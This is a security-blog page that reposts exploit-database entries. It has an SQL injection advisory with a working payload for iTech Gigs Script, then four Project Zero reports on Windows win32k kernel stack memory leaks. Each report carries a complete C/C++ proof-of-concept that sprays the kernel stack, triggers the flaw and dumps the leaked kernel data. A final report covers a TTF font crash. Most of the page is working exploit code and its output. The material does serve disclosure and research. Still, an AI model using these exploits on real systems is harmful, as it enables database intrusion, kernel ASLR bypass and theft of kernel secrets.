# Exploit Title: iTech Gigs Script v1.20 - SQL Injection
# Date: 2017-09-15
# Exploit Author: 8bitsec
# Vendor Homepage: http://itechscripts.com/
# Software Link: http://itechscripts.com/the-gigs-script/
# Version: 1.20
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-15
Product & Service Introduction:
===============================
Designed to launch an online market place facilitating participation of professionals from diverse walks of life.
Technical Details & Description:
================================
SQL injection on [cat] parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/browse-category.php?cat=xxxxx' AND 4079=4079 AND 'zpSy'='zpSy
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=10c4ca4238a0b923820dcc509a6f75849b' AND 4079=4079 AND 'zpSy'='zpSy
==================
8bitsec - [https://twitter.com/_8bitsec]
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863582429
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1307
We have discovered that the win32k!NtQueryCompositionSurfaceBinding system call discloses portions of uninitialized kernel stack memory to user-mode clients, as tested on Windows 10 32-bit.
The output buffer, and the corresponding temporary stack-based buffer in the kernel are 0x308 bytes in size. The first 4 and the trailing 0x300 bytes are zero'ed out at the beginning of the function:
--- cut ---
.text:0001939B mov [ebp+var_324], ebx
.text:000193A1 push 300h ; size_t
.text:000193A6 push ebx ; int
.text:000193A7 lea eax, [ebp+var_31C]
.text:000193AD push eax ; void *
.text:000193AE call _memset
--- cut ---
However, the remaining 4 bytes at offset 0x4 are never touched, and so they contain whatever data was written there by the previous system call. These 4 bytes are then subsequently leaked to the user-mode caller. Exploitation of this bug is further facilitated by the fact that the contents of the buffer are copied back to user-mode even if the syscall fails (e.g. composition surface handle can't be resolved etc).
The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call. An example output is as follows:
--- cut ---
00000000: 00 00 00 00 41 41 41 41 00 00 00 00 00 00 00 00 ....AAAA........
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
[...]
000002b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000002f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000300: 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ................
--- cut ---
It is clearly visible here that among all data copied from ring-0 to ring-3, 4 bytes at offset 0x4 remained uninitialized. Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
extern "C"
ULONG WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
for (ULONG i = 0; i < size; i++) {
ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static BYTE buffer[4096];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
// Windows 10 1607 32-bit.
CONST ULONG __NR_NtQueryCompositionSurfaceBinding = 0x13e0;
// Convert thread to GUI.
LoadLibrary(L"user32.dll");
// Spray the kernel stack to get visible results of the memory disclosure.
SprayKernelStack();
// Trigger the bug and display the output.
BYTE OutputBuffer[0x308] = { /* zero padding */ };
SystemCall32(__NR_NtQueryCompositionSurfaceBinding, 0, 0, OutputBuffer);
PrintHex(OutputBuffer, sizeof(OutputBuffer));
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1304
We have discovered that the win32k!NtGdiDoBanding system call discloses portions of uninitialized kernel stack memory to user-mode clients.
More specifically, exactly 8 bytes of uninitialized kernel stack memory are copied to ring-3 in one of two execution contexts (unique stack traces):
--- 1 ---
#0 win32k.sys!memcpy+00000033
#1 win32k.sys!UMPDOBJ::ThunkMemBlock+00000047
#2 win32k.sys!UMPDDrvStartBanding+000000b1
#3 win32k.sys!GreDoBanding+000000ad
#4 win32k.sys!NtGdiDoBanding+0000001f
#5 ntoskrnl.exe!KiSystemServicePostCall+00000000
--- 1 ---
... and ...
--- 2 ---
#0 win32k.sys!memcpy+00000033
#1 win32k.sys!UMPDOBJ::ThunkMemBlock+00000047
#2 win32k.sys!UMPDDrvNextBand+000000b1
#3 win32k.sys!GreDoBanding+0000011e
#4 win32k.sys!NtGdiDoBanding+0000001f
#5 ntoskrnl.exe!KiSystemServicePostCall+00000000
--- 2 ---
The names and offsets are specific to Windows 7 32-bit from February 2017, as symbols for the latest win32k.sys are not available from the Microsoft Symbol Server at the moment. The leaked bytes origin from the stack frame of the win32k!NtGdiDoBanding function (top-level syscall handler), and a pointer to the uninitialized buffer is passed down to win32k!GreDoBanding in the third argument.
The attached proof-of-concept program can be used to reproduce the vulnerability on Windows 7 32-bit. On our test virtual machine, the output is as follows:
--- cut ---
[+] Leaked data: 00000bf8 00460000
[+] Leaked data: ff9ed130 969e68ad
[+] Leaked data: ff9ed130 969e68ad
[+] Leaked data: ff9ed130 969e68ad
...
--- cut ---
As it turns out, 0xff9ed130 is a valid paged session pool address, and 0x969e68ad is a valid code address within win32k.sys:
--- cut ---
3: kd> !pool ff9ed130
Pool page ff9ed130 region is Paged session pool
ff9ed000 size: 118 previous size: 0 (Allocated) Usqu
*ff9ed118 size: ee8 previous size: 118 (Allocated) *GDev
Pooltag GDev : Gdi pdev
3: kd> u 969e68ad
win32k!EngReleaseSemaphore+0x2f6:
969e68ad c3 ret
969e68ae 90 nop
969e68af 90 nop
969e68b0 90 nop
969e68b1 90 nop
969e68b2 90 nop
969e68b3 8bff mov edi,edi
969e68b5 55 push ebp
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
namespace globals {
LPVOID(WINAPI *OrigClientPrinterThunk)(LPVOID);
} // namespace globals
PVOID *GetUser32DispatchTable() {
__asm {
mov eax, fs:30h
mov eax, [eax + 0x2c]
}
}
BOOL HookUser32DispatchFunction(UINT Index, PVOID lpNewHandler, PVOID *lpOrigHandler) {
PVOID *DispatchTable = GetUser32DispatchTable();
DWORD OldProtect;
if (!VirtualProtect(DispatchTable, 0x1000, PAGE_READWRITE, &OldProtect)) {
printf("VirtualProtect#1 failed, %d\n", GetLastError());
return FALSE;
}
*lpOrigHandler = DispatchTable[Index];
DispatchTable[Index] = lpNewHandler;
if (!VirtualProtect(DispatchTable, 0x1000, OldProtect, &OldProtect)) {
printf("VirtualProtect#2 failed, %d\n", GetLastError());
return FALSE;
}
return TRUE;
}
LPVOID WINAPI ClientPrinterThunkHook(LPVOID Data) {
LPDWORD DwordData = (LPDWORD)Data;
if (DwordData[0] == 0x1c && (DwordData[1] == 0x39 || DwordData[1] == 0x3a)) {
LPDWORD LeakedData = (LPDWORD)DwordData[6];
printf("[+] Leaked data: %.8x %.8x\n", LeakedData[0], LeakedData[1]);
}
return globals::OrigClientPrinterThunk(Data);
}
int main() {
// Hook the user32!ClientPrinterThunk callback.
if (!HookUser32DispatchFunction(93, ClientPrinterThunkHook, (PVOID *)&globals::OrigClientPrinterThunk)) {
printf("Hooking ClientPrinterThunk failed.\n");
return 1;
}
// Obtain a print job DC.
PRINTDLGA pd = { 0 };
pd.lStructSize = sizeof(pd);
pd.Flags = PD_RETURNDEFAULT | PD_ALLPAGES | PD_RETURNDC | PD_PRINTTOFILE;
pd.nFromPage = 1;
pd.nToPage = 1;
pd.nCopies = 1;
if (!PrintDlgA(&pd)) {
printf("PrintDlgA failed.\n");
return 1;
}
// Initialize the print job.
DOCINFOA doc_info = { 0 };
doc_info.cbSize = sizeof(doc_info);
doc_info.lpszDocName = "Document";
doc_info.lpszOutput = "C:\\Windows\\Temp\\output";
if (StartDocA(pd.hDC, &doc_info) <= 0) {
printf("StartDoc failed.\n");
return 1;
}
if (StartPage(pd.hDC) <= 0) {
printf("StartPage failed.\n");
return 1;
}
//
// The bug is triggered here.
//
EndPage(pd.hDC);
// Free resources.
EndDoc(pd.hDC);
DeleteDC(pd.hDC);
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1276&desc=2
We have discovered that the nt!NtGdiEngCreatePalette system call discloses large portions of uninitialized kernel stack memory to user-mode clients.
This is caused by the fact that for palettes created in the PAL_INDEXED mode with up to 256 colors, a temporary stack-based buffer is used by the syscall for optimization (instead of locking the entire ring-3 memory area with win32k!bSecureBits). The stack memory region is not pre-initialized with zeros, but its contents may still be treated as valid palette colors by win32k!EngCreatePalette, in the special corner case when:
a) 1 <= cColors <= 256
b) pulColors == NULL
The above setting causes the the win32k!bSafeReadBits to automatically succeed without actually reading any data from user-space, which further leads to the creation of a palette with colors set to uninitialized memory from the kernel stack (up to 1024 bytes!). These bytes can be subsequently read back using the GetPaletteEntries() API.
The vulnerability is fixed in Windows 8 and 10, which have the following memset() calls at the beginning of the function:
(Windows 8.1)
--- cut ---
.text:001B4B62 push 3FCh ; size_t
.text:001B4B67 lea eax, [ebp+var_400]
.text:001B4B6D mov [ebp+var_404], edi
.text:001B4B73 push edi ; int
.text:001B4B74 push eax ; void *
.text:001B4B75 call _memset
--- cut ---
(Windows 10)
--- cut ---
.text:002640C8 push 400h ; size_t
.text:002640CD mov [ebp+var_410], eax
.text:002640D3 lea eax, [ebp+var_404]
.text:002640D9 push edi ; int
.text:002640DA push eax ; void *
.text:002640DB mov [ebp+var_41C], ebx
.text:002640E1 call _memset
--- cut ---
This indicates that Microsoft is aware of the bug but didn't backport the fix to systems earlier than Windows 8. The issue was in fact discovered by cross-diffing the list of memset calls between Windows 7 and Windows 10, which illustrates how easy it is to use exclusive patches for one system version to attack another.
The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call. An example output is as follows:
--- cut ---
00000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000050: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000060: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000070: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000080: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000100: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000110: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000120: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000130: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000140: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000150: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000160: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000170: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000180: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000190: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000001f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000200: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000210: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000230: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000260: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000270: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000280: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000290: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002a0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000002f0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000300: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000310: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000320: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000330: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000340: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000350: 41 41 41 41 41 41 41 41 41 41 41 41 00 00 00 00 AAAAAAAAAAAA....
00000360: 21 00 00 00 00 00 00 00 88 0d cf 8e da 3f 87 82 !............?..
00000370: 09 50 14 00 04 00 00 00 00 dc 9d 98 25 82 5e 4d .P..........%.^M
00000380: 00 00 00 00 f0 dd 9d 98 d0 09 96 82 12 01 00 00 ................
00000390: 48 0d cf 8e 00 00 00 00 ae 01 00 00 6f 00 00 00 H...........o...
000003a0: 00 00 00 00 7e 53 0c 00 1c fc 1c 9a a5 f0 87 82 ....~S..........
000003b0: ef ff 07 00 12 01 00 00 40 58 14 00 cc f2 41 00 ........@X....A.
000003c0: 01 00 00 00 01 00 00 00 f0 dd 9d 98 00 00 00 00 ................
000003d0: 12 01 00 00 00 00 00 00 14 05 00 c0 25 82 5e 4d ............%.^M
000003e0: 00 00 00 00 00 00 00 00 00 10 00 00 6c fb 1c 9a ............l...
000003f0: 2c f9 1c 9a 67 08 00 00 67 08 00 00 48 0d cf 8e ,...g...g...H...
--- cut ---
The planted 0x41 bytes are clearly visible in the above hex dump. Since the stack spraying primitive used here (nt!NtMapUserPhysicalPages) still leaves some bytes intact at higher addresses, these bytes (containing a number of kernel-space addresses etc.) can be observed at offsets 0x360-0x400.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <winddi.h>
#include <cstdio>
extern "C"
NTSTATUS WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PVOID ptr, BYTE byte, ULONG size) {
PBYTE _ptr = (PBYTE)ptr;
for (ULONG i = 0; i < size; i++) {
_ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static SIZE_T buffer[1024];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, ARRAYSIZE(buffer), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
// Windows 7 32-bit.
CONST ULONG __NR_NtGdiEngCreatePalette = 0x129c;
// Initialize the thread as GUI.
LoadLibrary(L"user32.dll");
// Fill the kernel stack with some marker 'A' bytes.
SprayKernelStack();
// Create a Palette object with 256 4-byte uninitialized colors from the kernel stack.
HPALETTE hpal = (HPALETTE)SystemCall32(__NR_NtGdiEngCreatePalette, PAL_INDEXED, 256, NULL, 0.0f, 0.0f, 0.0f);
if (hpal == NULL) {
printf("[-] NtGdiEngCreatePalette failed.\n");
return 1;
}
// Retrieve the uninitialized bytes back to user-mode.
PALETTEENTRY palentries[256] = { /* zero padding */ };
if (GetPaletteEntries(hpal, 0, 256, palentries) != 256) {
printf("[-] GetPaletteEntries failed.\n");
return 1;
}
// Dump the data on screen.
PrintHex((PBYTE)palentries, sizeof(palentries));
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1275
We have discovered that the nt!NtGdiGetFontResourceInfoInternalW system call discloses portions of uninitialized kernel stack memory to user-mode clients.
This is caused by the fact that for user-specified output buffer sizes up to 0x5c, a temporary stack-based buffer is used by the syscall for optimization. As opposed to the pool allocation, the stack memory area is not pre-initialized with zeros, and when it is copied back to user-mode in its entirety, its contents disclose leftover kernel stack bytes containing potentially sensitive information.
The vulnerability is fixed in Windows 10, which has the following memset() call at the beginning of the function:
--- cut ---
.text:0025F9E6 push 5Ch ; size_t
.text:0025F9E8 push ebx ; int
.text:0025F9E9 lea eax, [ebp+var_118]
.text:0025F9EF push eax ; void *
.text:0025F9F0 call _memset
--- cut ---
This indicates that Microsoft is aware of the bug but didn't backport the fix to systems earlier than Windows 10. The issue was in fact discovered by cross-diffing the list of memset calls between Windows 7 and Windows 10, which illustrates how easy it is to use exclusive patches for one system version to attack another.
The attached proof-of-concept program demonstrates the disclosure. An example output is as follows:
--- cut ---
00000000: 00 00 00 00 a9 fb c2 82 02 00 00 00 19 00 00 00 ................
00000010: 00 00 00 00 46 69 6c 65 a8 6f 06 89 46 69 6c 65 ....File.o..File
00000020: c8 00 00 00 ff 07 00 00 00 00 00 00 00 30 06 89 .............0..
00000030: 00 08 00 00 46 02 00 00 68 72 b8 93 d0 71 b8 93 ....F...hr...q..
00000040: a8 71 b8 93 00 8b 2e 9a 98 a8 a2 82 68 8b 2e 9a .q..........h...
00000050: fa a8 a2 82 a8 71 b8 93 46 69 6c e5 ?? ?? ?? ?? .....q..Fil.....
--- cut ---
Only the first four bytes of the data are properly initialized to 0x00, while the rest are visibly leaked from the kernel stack and contain a multitude of kernel-space addresses, readily facilitating exploitation of other memory corruption vulnerabilities.
The bug is limited to leaking at most ~0x5c bytes at a time, as specifying a larger size will provoke a correctly padded pool allocation instead of the stack-based buffer.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
// Undocumented definitions for the gdi32!GetFontResourceInfoW function.
typedef BOOL(WINAPI *PGFRI)(LPCWSTR, LPDWORD, LPVOID, DWORD);
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
int main() {
// Resolve the GDI32!GetFontResourceInfoW symbol.
HINSTANCE hGdi32 = LoadLibrary(L"gdi32.dll");
PGFRI GetFontResourceInfo = (PGFRI)GetProcAddress(hGdi32, "GetFontResourceInfoW");
// Trigger the vulnerability and dump kernel stack output. The code assumes that Windows is
// installed on partition C:\ and the C:\Windows\Fonts\arial.ttf font is present on disk.
BYTE OutputBuffer[0x5c] = { /* zero padding */ };
DWORD OutputSize = sizeof(OutputBuffer);
if (!GetFontResourceInfo(L"C:\\Windows\\Fonts\\arial.ttf", &OutputSize, OutputBuffer, 5)) {
printf("GetFontResourceInfo failed.\n");
return 1;
}
PrintHex(OutputBuffer, sizeof(OutputBuffer));
return 0;
}
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1274
We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff1effff, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91a65a52, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
FAULTING_IP:
win32k!fsc_CalcGrayRow+87
91a65a52 660fbe4fff movsx cx,byte ptr [edi-1]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 91a65990 to 91a65a52
STACK_TEXT:
981a885c 91a65990 ff1f83f8 ff1f8140 ff1f83a8 win32k!fsc_CalcGrayRow+0x87
981a88a0 919e26ac 00000008 ff1f8010 fbb36e78 win32k!fsc_CalcGrayMap+0x105
981a88e8 91b69e1a ff1f8010 ff1f807c 00000005 win32k!fs_ContourScan+0x582
981a89f4 91b69ef2 00000000 00000005 981a8b08 win32k!lGGOBitmap+0x15f
981a8a1c 919dd4f0 fbb36e78 00000005 981a8b08 win32k!ttfdGlyphBitmap+0x60
981a8a40 919dd386 fc23ccf0 00000009 00000005 win32k!ttfdQueryFontData+0x115
981a8a90 919dc5b2 00000000 fc23ccf0 00000009 win32k!ttfdSemQueryFontData+0x45
981a8ad8 91b351b4 00000000 fc23ccf0 00000009 win32k!PDEVOBJ::QueryFontData+0x3e
981a8b90 91b2cd60 fc23ccf0 fc23ccf0 00000006 win32k!GreGetGlyphOutlineInternal+0x534
981a8c0c 8288587a 04010215 00000022 00000006 win32k!NtGdiGetGlyphOutline+0x95
981a8c0c 76f370b4 04010215 00000022 00000006 nt!KiFastCallEntry+0x12a
WARNING: Frame IP not in any known module. Following frames may be wrong.
0020f504 00000000 00000000 00000000 00000000 0x76f370b4
---
The above crash dump comes from an old version of Windows 7 32-bit, because symbols for win32k.sys on the latest build are currently unavailable on the Microsoft Symbol Server. Nevertheless, a crash summary from an up-to-date system is as follows:
--- cut ---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff1e3fff, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91ce9382, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
FAULTING_IP:
win32k!EngDeleteClip+4883
91ce9382 660fbe4fff movsx cx,byte ptr [edi-1]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre
LAST_CONTROL_TRANSFER: from 91ce92c0 to 91ce9382
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
9aa98858 91ce92c0 ff1ee3f8 ff1ee140 ff1ee3a8 win32k!EngDeleteClip+0x4883
9aa9889c 91c64346 00000008 ff1ee010 fb9dce78 win32k!EngDeleteClip+0x47c1
9aa988e4 91dfa025 ff1ee010 ff1ee07c 00000005 win32k!XFORMOBJ_iGetXform+0x5864
9aa989f0 91dfa0fd 00000000 00000005 9aa98b04 win32k!XLATEOBJ_hGetColorTransform+0x40a1c
9aa98a18 91c5f086 fb9dce78 00000005 9aa98b04 win32k!XLATEOBJ_hGetColorTransform+0x40af4
9aa98a3c 91c5ef1c fc22ccf0 00000009 00000005 win32k!XFORMOBJ_iGetXform+0x5a4
9aa98a8c 91c5e138 00000000 fc22ccf0 00000009 win32k!XFORMOBJ_iGetXform+0x43a
9aa98ad4 91dc3424 00000000 fc22ccf0 00000009 win32k!EngCTGetGammaTable+0xc967
9aa98b90 91dbafcc fc22ccf0 fc22ccf0 00000006 win32k!XLATEOBJ_hGetColorTransform+0x9e1b
9aa98c0c 82888986 0c0104d1 00000022 00000006 win32k!XLATEOBJ_hGetColorTransform+0x19c3
9aa98c0c 77986c74 0c0104d1 00000022 00000006 nt!KiSystemServicePostCall
001cf4ac 00000000 00000000 00000000 00000000 0x77986c74
--- cut ---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf" table.
The issue reproduces on Windows 7 (other platforms untested). It is easiest to reproduce with Special Pools enabled for win32k.sys. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which calls the GetGlyphOutline() API with various parameters over all of the font's glyphs.
Attached is an archive with several proof-of-concept mutated TTF files.
Proof of Concept:
